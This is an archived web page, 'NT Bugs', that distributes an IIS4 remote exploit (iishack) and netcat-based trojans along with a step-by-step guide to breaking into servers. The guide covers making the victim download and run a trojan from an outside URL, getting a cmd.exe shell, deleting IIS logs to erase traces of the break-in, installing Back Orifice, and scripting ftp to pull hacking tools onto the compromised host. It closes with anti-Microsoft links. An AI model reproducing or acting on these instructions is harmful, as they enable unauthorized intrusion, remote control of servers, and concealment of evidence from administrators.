Welcome to NT Bugs

Here, you will find out why Windows may be the desktop of choice, but SHOULD NOT BE USED AS A SERVER.

A very serious bug in IIS4 has been found, that lets anybody in the world get a DOS prompt in the server, even if it is behind the best firewall. The exploit programs are included so you can find out if your own server is vulnerable. (Please do not hack into other peoples' servers with this, that might be illegal!)

Win32 (assembly) Source code:	iishack.asm	12,523 bytes	[674]
Unix (c) Source code:	iishack.c	9,935 bytes	[516]
Exploit program:	iishack.exe	3,526 bytes	[2151]
Trojan (port 80):	ncx.exe	31,744 bytes	[1593]
Trojan (port 99):	ncx99.exe	59,392 bytes	[1321]

How it works:
When you run iishack.exe with the correct options, it will send a big request to the web server, containing a little 500-byte program to run. Due to very poor quality programming in IIS, it will run this little program you send it. This little program will fetch the trojan program (in this case, ncx.exe or ncx99.exe) from the URL you specify when you run iishack.exe. Then, after downloading the trojan, it will run it. This trojan that is included here is a modified version of netcat (a UNIX utility) that binds to a port and waits for a connection. When it receives a connection, it runs cmd.exe (gives you a DOS prompt) and you have access to the server. Big thanks to the eEye [119] Digital Security Team for finding this hole and writing the exploit!

How to break into your server:
First of all, you need to take ncx.exe and / or ncx99.exe and put it on some other web site. You can probably put it on geocities or tripod or something. Then, at a DOS prompt on your computer, type this:

iishack www.example.com 80 www.myhomepage.com/mydirectory/ncx.exe

This will connect to www.example.com at port 80, and send the attack. The victim server will then download http://www.myhomepage.com/mydirectory/ncx.exe and run it.
Here is the usage from the program:

(c) dark spyrit -- [email protected].
http://www.eEye.com
[usage: iishack <host> <port> <url>]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!

Once the attack is sent, IIS4 on the victim server (www.example.com) will crash, and your trojan program (ncx.exe) will be downloaded and run. Then, telnet to the server at port 80 (ncx.exe) or port 99 (ncx99.exe) and if you were successful, you'll get a DOS prompt. Remember, the victim server might need a few seconds to download the trojan. If you telnet to it before it has downloaded it, it will refuse the connection. Just keep trying. If you're still not in after 30 seconds, you can give up, and try again after the server is rebooted. If you used the port 99 trojan and it doesn't work, make sure you can download the trojan from the URL you used when running iishack.exe. If you have tried everything and you can only make IIS4 crash, then this exploit won't work on that particular server. (Don't think it is secure though, another exploit could work if it was modified a little bit)

Should I use port 80 or port 99?
First, before you do anything, telnet to the victim server at port 99. If it refuses the connection, this is good (it means it's not firewalled) and you can use the port 99 trojan. If the connection times out, it is probably firewalled, and you must use the port 80 trojan. Use the port 99 one if you can, port 80 might fail (it might have trouble binding to the port if the web server crashes too slowly). Also, if somebody browses a site on the server right after running the trojan, it might get the DOS prompt instead of you. Using port 80 can let you get through any firewall, though.

Tips on using it
Once you are in, you can delete the log file so you don't leave any trace of your entry. You start out in \winnt\system32, do a "cd logs" then "cd w3svc1" and do "dir /od" to find the most recent log. It will probably be 65k in size. Deleting this will remove all record of the break-in. Once you're in, don't exit until you have finished everything - it will only accept one telnet, once it's finished you don't get a second chance until your administrator comes in the next morning and finds it dead. Do not run anything interactive (such as ftp), your telnet session can't control it properly and you will be stuck. You might consider trying to install Back Orifice 2000 from CDC [156] for complete remote control of the server.

How to upload / download files inside telnet?
Once a hacker has access to your machine, he will need to download his favorite hacks and remote-control program like Back Orifice. FTP is probably the easiest way, but you can't do it interactively. Here's how to use it from a really dumb terminal:

C:\> echo anonymous > myscript.txt
C:\> echo [email protected] >> myscript.txt
C:\> echo cd pub >> myscript.txt
C:\> echo binary >> myscript.txt
C:\> echo get hacktool.exe >> myscript.txt
C:\> echo bye >> myscript.txt
C:\> ftp -s:myscript.txt ftp.myserver.com
C:\> del myscript.txt

You should now have hacktool.exe in your current directory. If the server is behind a firewall, you'll have to be more creative.

How to protect your server
As long as you are running NT, you can never be secure. There will always be more bugs coming that can make your life even more miserable than it already is. To completely fix the problem, you should be using an Apache [43] web server running Sun Microsystems [33] Solaris [32] on UltraSPARC [33] hardware. If you are a cheap bastard and don't want to buy quality hardware, you could always run Linux [39] on your existing server hardware.
Good luck!

Interesting reading:

Microsoft doesn't care about bugs [248 clicks]
http://ntbugs.aaronkwok.com/sendmeto/nobugs?http://www.cantrip.org/nobugs.html

From Microsoft Word to Microsoft World: How Microsoft is Building a Global Monopoly [24 clicks]
(Amazingly, much of this is echoed in the USDOJ's Findings of Fact [21 clicks]) http://ntbugs.aaronkwok.com/sendmeto/msworld?http://netaction.org/msoft/world/MSWord2World.html

Microsoft Windows NT Server 4.0 versus UNIX [88 clicks]
http://ntbugs.aaronkwok.com/sendmeto/unix-vs-nt?http://www.unix-vs-nt.org/kirch/

A review of Sun Solaris vs NT [35 clicks]
http://ntbugs.aaronkwok.com/sendmeto/standish-syst?http://www.standishgroup.com/syst.html

NT Religious Wars: Why Are DARPA Researchers Afraid of Windows NT? [65 clicks]
http://ntbugs.aaronkwok.com/sendmeto/darpa?http://www.dyncorp-is.com/darpa/meetings/win98aug/wars.html

Microsoft left backdoor in win95/98/nt4/2000 for U.S. Government to spy on you [285 clicks]
http://ntbugs.aaronkwok.com/sendmeto/backdoor?http://www.cryptonym.com/hottopics/msft-nsa.html

Internet explorer crashing and exploits [134 clicks]
http://ntbugs.aaronkwok.com/sendmeto/iecrashing?http://www.whitehats.com/guninski/browsers.html

Former Microsoft contractor says the company deliberately mislead Government buyers:
NT 3.5 with SP3 (with NO networking installed) is actually the only C2 certified OS [67 clicks]
http://ntbugs.aaronkwok.com/sendmeto/ntgov1?http://www.ntgov.com/archives/gcn/1998/October26/8.htm

NT critic gets audience with DOD chieftains [23 clicks]
http://ntbugs.aaronkwok.com/sendmeto/ntgov2?http://www.ntgov.com/archives/gcn/1998/October12/1c.htm

C2 rating aside, NT isn't secure [120 clicks]
http://ntbugs.aaronkwok.com/sendmeto/ntgov3?http://www.gcn.com/archives/gcn/1995/September4/nthole.htm